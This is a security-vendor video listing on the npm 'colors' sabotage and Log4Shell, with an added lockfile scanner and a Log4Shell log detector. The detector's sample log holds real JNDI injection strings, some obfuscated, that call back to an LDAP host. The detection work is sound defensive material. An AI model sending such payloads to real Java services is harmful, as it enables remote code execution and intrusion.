
Latest Videos

What You Should Know About npm Packages 'colors' and 'faker'

On January 8, 2022, the open source maintainer of the wildly popular npm package colors published colors@1.4.1 and colors@1.4.44-liberty-2, in which they intentionally introduced a commit that adds an infinite loop to the package's source code. The loop runs as soon as the module is loaded, so any Node.js process that requires colors hangs at startup, a Denial of Service (DoS) against every server that depends on it.
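Because the sabotage shipped as ordinary published versions, the practical control is to refuse to install them. The following is an added example (not code from the colors project or from Snyk) that walks a package-lock.json in either lockfile format and reports every install path that resolves to one of the two versions named above, including transitive copies nested under another dependency. The sample lockfiles are constructed for the example; the set of bad versions is the two listed on this page.

```javascript
// Added example: gate `npm ci` on a lockfile scan for the sabotaged colors releases.
// Not code from the colors project or from Snyk. AFFECTED lists the two versions
// named in the text above; extend it if your advisory feed adds more.
const AFFECTED = { colors: new Set(['1.4.1', '1.4.44-liberty-2']) };

// Return every install path whose name/version pair is in `affected`.
// Handles both lockfile layouts:
//   lockfileVersion 2/3: flat "packages" map keyed by install path
//     ("node_modules/some-cli/node_modules/colors")
//   lockfileVersion 1:   nested "dependencies" trees
function findAffected(lock, affected = AFFECTED) {
  const hits = [];
  const check = (path, name, version) => {
    if (affected[name] && affected[name].has(version)) hits.push({ path, name, version });
  };

  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (!path) continue; // "" is the root project itself, not a dependency
      // Package name is everything after the last "node_modules/" (keeps "@scope/name" intact).
      const name = path.slice(path.lastIndexOf('node_modules/') + 'node_modules/'.length);
      check(path, name, meta.version);
    }
  } else if (lock.dependencies) {
    const walk = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps)) {
        const path = `${prefix}node_modules/${name}`;
        check(path, name, meta.version);
        if (meta.dependencies) walk(meta.dependencies, `${path}/`); // nested (deduped-out) copies
      }
    };
    walk(lock.dependencies, '');
  }
  return hits;
}

function lockfileIsClean(lock, affected = AFFECTED) {
  return findAffected(lock, affected).length === 0;
}

// Constructed sample: a v3 lockfile where the project's own "^1.4.0" range floated to 1.4.1,
// while a CLI dependency pinned its own nested copy to 1.4.0.
const SAMPLE_LOCK_V3 = {
  name: 'demo-api',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-api', dependencies: { colors: '^1.4.0', 'some-cli': '2.0.0' } },
    'node_modules/colors': { version: '1.4.1' },
    'node_modules/some-cli': { version: '2.0.0', dependencies: { colors: '1.4.0' } },
    'node_modules/some-cli/node_modules/colors': { version: '1.4.0' },
  },
};

// Constructed sample: a v1 lockfile where only a transitive copy is the liberty build.
const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    'some-cli': { version: '2.0.0', dependencies: { colors: { version: '1.4.44-liberty-2' } } },
    colors: { version: '1.4.0' },
  },
};
```

Feed it the parsed file (`JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))`) from a CI step and fail the build when `lockfileIsClean` is false. The scan only reports; the remediation is to pin a known-good version (for example with an `overrides` entry in package.json on npm 8.3 or later) and regenerate the lockfile.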

The Missing Pieces in Securing your SDLC

Navigating the world of secure software development is hard. There is a lot of noise and not enough time to investigate everything thoroughly. Make your life and the lives of your colleagues easier by building a world-class DevSecOps automation pipeline. Automate feedback delivery in a way that makes sense. It doesn’t have to be hard; automate the pain away!

Demystifying DevOps: Pros, cons, dos & don'ts

We hear a lot about DevOps, but how do we turn it from myth into reality? In this panel, Waleed Arshad, Community Manager at Snyk, Frank Dornberger, Team Lead of DevSecOps at movingimage EVP GmbH, and Idir Ouhab Meskine, Staff Solutions Engineer at Splunk, go over the pros, cons, dos and don'ts of DevOps.

Snyk Log4Shell Stranger Danger Live Hack (APJ)

Note: As of Dec. 28, 2 PM PST, we recommend upgrading to the latest Log4j version. We give a brief overview of the vulnerability and dive right into some examples of the exploit in action. We then show several real-world remediation approaches as well as other fixes outside code. We give a final round of fun demos, including container and IaC hacks as well as Java-based game hacks. We wrap up with a great list of takeaway resources and answer your questions.

Log4Shell PoC exploit and mitigation demo on Kubernetes

Demonstration of an RCE against the Log4Shell / CVE-2021-44228 vulnerability on a PoC Java EE app running on Kubernetes. I also go over a few mitigation steps you can take to reduce your exposure to this and other such exploits. References mentioned in the video:

Snyk Log4Shell Stranger Danger Live Hack

In this recorded session, we present a live hack webinar on the Log4Shell exploit. We give a brief overview of the vulnerability and dive right into some examples of the exploit in action. We then show several real-world remediation approaches as well as other fixes outside code. We give a final round of fun demos, including container and IaC hacks as well as Java-based game hacks. We wrap up with a great list of takeaway resources and answer your questions.
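The three Log4Shell sessions above show the exploit and its remediation; the one thing a defender also needs while patching is a way to see the probes arriving. The following is an added example (not code from the webinar, the PoC app, or Snyk) that scans access-log lines for CVE-2021-44228 lookup strings. A grep for the literal `${jndi:` is not enough, because Log4j resolves `${...}` lookups recursively and attackers hide the keyword behind `${lower:j}`, `${::-j}` (an empty lookup name with a default value) or URL-encoding; the code undoes those cheap obfuscations before matching. The log lines and IP addresses are constructed for the example.

```javascript
// Added example: detect Log4Shell (CVE-2021-44228) probe strings in access logs,
// including nested-lookup and URL-encoded obfuscation. Illustrative detection code,
// not the demo application or tooling from the webinar.

// An innermost lookup: ${...} whose body contains no further "${".
const INNERMOST = /\$\{([^${}]*)\}/g;
const JNDI = /\$\{\s*jndi\s*:/i;

// Resolve one innermost lookup the way Log4j's substitutor would, or return null
// to leave it as written. The jndi check comes first so "${jndi:...:-x}" is never
// collapsed into its default value and hidden from the match below.
function resolveOne(body) {
  if (/^\s*jndi\s*:/i.test(body)) return null;
  const def = body.indexOf(':-');
  if (def !== -1) return body.slice(def + 2);               // ${name:-default} -> default
  const m = body.match(/^(lower|upper):([\s\S]*)$/);
  if (m) return m[1] === 'lower' ? m[2].toLowerCase() : m[2].toUpperCase();
  return null;                                              // date:, env:, sys: ... stay put
}

// Collapse nested lookups from the inside out; bounded so crafted input cannot spin forever.
function normalizeLookups(s, maxRounds = 16) {
  let out = s;
  for (let round = 0; round < maxRounds; round++) {
    let changed = false;
    out = out.replace(INNERMOST, (whole, body) => {
      const r = resolveOne(body);
      if (r === null) return whole;
      changed = true;
      return r;
    });
    if (!changed) break;
  }
  return out;
}

// Percent-decode when possible; malformed sequences fall back to the raw text.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// True when the line carries a JNDI lookup, raw or obfuscated, plain or URL-encoded.
function isLog4ShellProbe(line) {
  return [line, safeDecode(line)].some(v => JNDI.test(normalizeLookups(v)));
}

// Scan a batch of lines; each hit carries its 1-based line number and the de-obfuscated text.
function scanLog(lines) {
  const hits = [];
  lines.forEach((raw, i) => {
    if (isLog4ShellProbe(raw)) hits.push({ line: i + 1, normalized: normalizeLookups(safeDecode(raw)) });
  });
  return hits;
}

// Constructed sample log (documentation-range addresses): one benign request, three probe
// variants (plain, lower-lookup nesting, URL-encoded with the ${::-j} trick), and a harmless
// non-jndi lookup that must not be flagged.
const SAMPLE_LOG = [
  '203.0.113.9 - - [10/Dec/2021:14:02:11 +0000] "GET /health HTTP/1.1" 200 12 "-" "curl/7.79.1"',
  '198.51.100.23 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
  '198.51.100.23 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.23:1389/b}"',
  '198.51.100.23 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fc%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [10/Dec/2021:14:02:16 +0000] "GET /report?d=${date:yyyy-MM-dd} HTTP/1.1" 200 88 "-" "curl/7.79.1"',
];
```

This is log-side detection, not a fix: a flagged line tells you the host was targeted, and the normalized text gives you the attacker's callback address for egress blocking and hunting. The vulnerability itself goes away only by upgrading Log4j, as the session notes above say. The normalizer handles only the `lower`, `upper` and default-value nestings; other lookup types are left as written, so a line that still contains `${` after normalization is worth a second look.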

Snyk Code Hands-on Workshop

Snyk Code is developer-first: it embeds SAST in the development process so developers can build software securely as they write it, rather than trying to find and fix problems after the code is compiled. Snyk Code works in the IDEs and SCMs developers use to build and review software and provides fast, actionable, meaningful results to fix issues in real time.